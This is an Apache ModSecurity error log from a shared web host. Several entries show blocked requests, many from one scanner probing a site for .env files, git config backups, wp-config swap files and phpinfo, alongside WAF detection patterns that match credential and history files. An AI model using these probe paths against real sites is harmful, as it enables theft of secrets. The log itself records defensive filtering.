[Tue May 26 13:39:24.022535 2026] [security2:error] [pid 536875:tid 537117] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVM-r_-FTveSGlx1HnQwAAAPU"]
[Tue May 26 13:39:24.282108 2026] [security2:error] [pid 536875:tid 536920] [remote 109.205.180.55:60412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.180.205.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVVNOr_-FTveSGlx1HnSgAAsCw"]
[Tue May 26 13:39:24.747921 2026] [security2:error] [pid 536875:tid 537114] [client 114.119.128.158:52301] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/homepages/creative-agency"] [unique_id "ahVVNOr_-FTveSGlx1HnVQAAAPI"], referer: http://www.anujtradingco.com/homepages/creative-agency/
[Tue May 26 13:39:25.810778 2026] [security2:error] [pid 544395:tid 544588] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVNRmrs7g3RMCdp8XIOgAAAD8"]
[Tue May 26 13:39:26.045890 2026] [fcgid:warn] [pid 536875:tid 537010] (70014)End of file found: [client 66.132.186.181:28908] mod_fcgid: can't get data from http client
[Tue May 26 13:39:27.263090 2026] [security2:error] [pid 536875:tid 537013] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVNur_-FTveSGlx1HndAAAAI0"]
[Tue May 26 13:39:28.592176 2026] [security2:error] [pid 544395:tid 544612] [client 114.119.139.220:65125] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/referanslar/"] [unique_id "ahVVOBmrs7g3RMCdp8XIWQAAAFc"], referer: https://trickyairbedshocks.com/s/cdn/?cagmedya.com
[Tue May 26 13:39:29.675412 2026] [autoindex:error] [pid 544395:tid 544644] [client 129.211.229.121:35820] AH01276: Cannot serve directory /home2/restmwhm/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:39:29.806142 2026] [security2:error] [pid 544395:tid 544540] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVORmrs7g3RMCdp8XIZwAAAA8"]
[Tue May 26 13:39:29.844948 2026] [security2:error] [pid 536875:tid 537029] [client 35.175.92.196:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahVVOer_-FTveSGlx1HnlwAAAJ0"]
[Tue May 26 13:39:29.845380 2026] [security2:error] [pid 544395:tid 544579] [client 35.175.92.196:35316] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahVVORmrs7g3RMCdp8XIcQAAADY"]
[Tue May 26 13:39:29.890337 2026] [security2:error] [pid 536875:tid 536937] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/backend/.env"] [unique_id "ahVVOer_-FTveSGlx1HnmgAA3z0"]
[Tue May 26 13:39:29.890341 2026] [security2:error] [pid 536875:tid 536998] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "whitesun.in"] [uri "/*update.cgi*"] [unique_id "ahVVOer_-FTveSGlx1HnmQAA33o"]
[Tue May 26 13:39:30.038225 2026] [security2:error] [pid 536875:tid 536918] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.docker/.env"] [unique_id "ahVVOur_-FTveSGlx1HnowAAnCo"]
[Tue May 26 13:39:30.038253 2026] [security2:error] [pid 536875:tid 536936] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env"] [unique_id "ahVVOur_-FTveSGlx1HnqAAAnDw"]
[Tue May 26 13:39:30.039662 2026] [security2:error] [pid 536875:tid 536922] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVVOur_-FTveSGlx1HnpQAAnC4"]
[Tue May 26 13:39:30.054875 2026] [security2:error] [pid 544395:tid 544564] [client 35.175.92.196:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahVVOhmrs7g3RMCdp8XIdgAAACc"]
[Tue May 26 13:39:30.056700 2026] [security2:error] [pid 536875:tid 537121] [client 35.175.92.196:55468] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahVVOur_-FTveSGlx1HnqQAAAPk"]
[Tue May 26 13:39:30.185981 2026] [security2:error] [pid 536875:tid 536928] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env.backup"] [unique_id "ahVVOur_-FTveSGlx1HnrwAAiDQ"]
[Tue May 26 13:39:30.186204 2026] [security2:error] [pid 536875:tid 536992] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env.bak"] [unique_id "ahVVOur_-FTveSGlx1HnsAAAiHQ"]
[Tue May 26 13:39:30.456204 2026] [security2:error] [pid 544395:tid 544593] [client 35.175.92.196:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/index.html"] [unique_id "ahVVOhmrs7g3RMCdp8XIgQAAAEQ"]
[Tue May 26 13:39:30.457311 2026] [security2:error] [pid 536875:tid 537018] [client 35.175.92.196:55474] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahVVOur_-FTveSGlx1HnuwAAAJI"]
[Tue May 26 13:39:30.482522 2026] [security2:error] [pid 536875:tid 536940] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/.env.php"] [unique_id "ahVVOur_-FTveSGlx1HnvwAAsUA"]
[Tue May 26 13:39:30.482860 2026] [security2:error] [pid 536875:tid 536939] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env.old"] [unique_id "ahVVOur_-FTveSGlx1HnvgAAsT8"]
[Tue May 26 13:39:30.629505 2026] [security2:error] [pid 536875:tid 536947] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env.swp"] [unique_id "ahVVOur_-FTveSGlx1HnxwAAx0c"]
[Tue May 26 13:39:30.632143 2026] [security2:error] [pid 536875:tid 536950] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env~"] [unique_id "ahVVOur_-FTveSGlx1HnygAAx0o"]
[Tue May 26 13:39:30.915012 2026] [security2:error] [pid 544395:tid 544491] [remote 185.192.20.168:0] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "185.192.20.168" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahVVOhmrs7g3RMCdp8XIjgAAI18"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 13:39:30.915185 2026] [security2:error] [pid 544395:tid 544560] [client 185.192.20.168:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahVVOhmrs7g3RMCdp8XIjgAAI18"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 13:39:30.925090 2026] [security2:error] [pid 536875:tid 536954] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.git/config~"] [unique_id "ahVVOur_-FTveSGlx1Hn2AAAm04"]
[Tue May 26 13:39:30.925686 2026] [security2:error] [pid 536875:tid 536969] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.git/config.bak"] [unique_id "ahVVOur_-FTveSGlx1Hn1gAAm10"]
[Tue May 26 13:39:30.925739 2026] [security2:error] [pid 536875:tid 536956] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.git/config.old"] [unique_id "ahVVOur_-FTveSGlx1Hn1wAAm1A"]
[Tue May 26 13:39:31.039275 2026] [security2:error] [pid 536875:tid 536966] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env"] [unique_id "ahVVO-r_-FTveSGlx1Hn4AAAhlo"]
[Tue May 26 13:39:31.096751 2026] [autoindex:error] [pid 544395:tid 544573] [client 205.210.31.13:62616] AH01276: Cannot serve directory /home2/abili6ui/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:39:31.129225 2026] [security2:error] [pid 544395:tid 544615] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVOhmrs7g3RMCdp8XIiwAAAFo"]
[Tue May 26 13:39:31.145307 2026] [core:crit] [pid 544395:tid 544545] (13)Permission denied: [client 52.167.144.222:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:39:31.496902 2026] [autoindex:error] [pid 536875:tid 536899] [remote 45.148.10.95:51320] AH01276: Cannot serve directory /home2/whitece9/public_html/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:39:31.510871 2026] [security2:error] [pid 536875:tid 536906] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/.wp-config.php.swp"] [unique_id "ahVVO-r_-FTveSGlx1HoFwAA4R4"]
[Tue May 26 13:39:31.513459 2026] [security2:error] [pid 536875:tid 536985] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/ADMIN/.env"] [unique_id "ahVVO-r_-FTveSGlx1HoGgAA4W0"]
[Tue May 26 13:39:31.522429 2026] [autoindex:error] [pid 536875:tid 536913] [remote 45.148.10.95:51320] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:39:31.522954 2026] [autoindex:error] [pid 536875:tid 536982] [remote 45.148.10.95:51320] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:39:31.546527 2026] [autoindex:error] [pid 536875:tid 536912] [remote 45.148.10.95:51320] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:39:31.586309 2026] [core:crit] [pid 544395:tid 544629] (13)Permission denied: [client 52.167.144.222:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:39:31.630919 2026] [security2:error] [pid 536875:tid 536908] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/API/.env"] [unique_id "ahVVO-r_-FTveSGlx1HoIAAA6CA"]
[Tue May 26 13:39:31.642855 2026] [security2:error] [pid 536875:tid 536929] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/APP/.env"] [unique_id "ahVVO-r_-FTveSGlx1HoJwAA9TU"]
[Tue May 26 13:39:31.656433 2026] [security2:error] [pid 536875:tid 536937] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/Api/.env"] [unique_id "ahVVO-r_-FTveSGlx1HoKAAApT0"]
[Tue May 26 13:39:31.656846 2026] [security2:error] [pid 536875:tid 536927] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/BACK/.env"] [unique_id "ahVVO-r_-FTveSGlx1HoKQAApTM"]
[Tue May 26 13:39:31.656874 2026] [security2:error] [pid 536875:tid 536923] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/BACKEND/.env"] [unique_id "ahVVO-r_-FTveSGlx1HoKgAApS8"]
[Tue May 26 13:39:31.658781 2026] [security2:error] [pid 536875:tid 536933] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/BE/.env"] [unique_id "ahVVO-r_-FTveSGlx1HoKwAAuTk"]
[Tue May 26 13:39:31.668341 2026] [security2:error] [pid 536875:tid 536936] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/Backend/.env"] [unique_id "ahVVO-r_-FTveSGlx1HoLQAA9Dw"]
[Tue May 26 13:39:31.668615 2026] [security2:error] [pid 536875:tid 536926] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/Be/.env"] [unique_id "ahVVO-r_-FTveSGlx1HoLgAA9DI"]
[Tue May 26 13:39:31.947897 2026] [security2:error] [pid 536875:tid 536924] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVVO-r_-FTveSGlx1HoSwAAszA"]
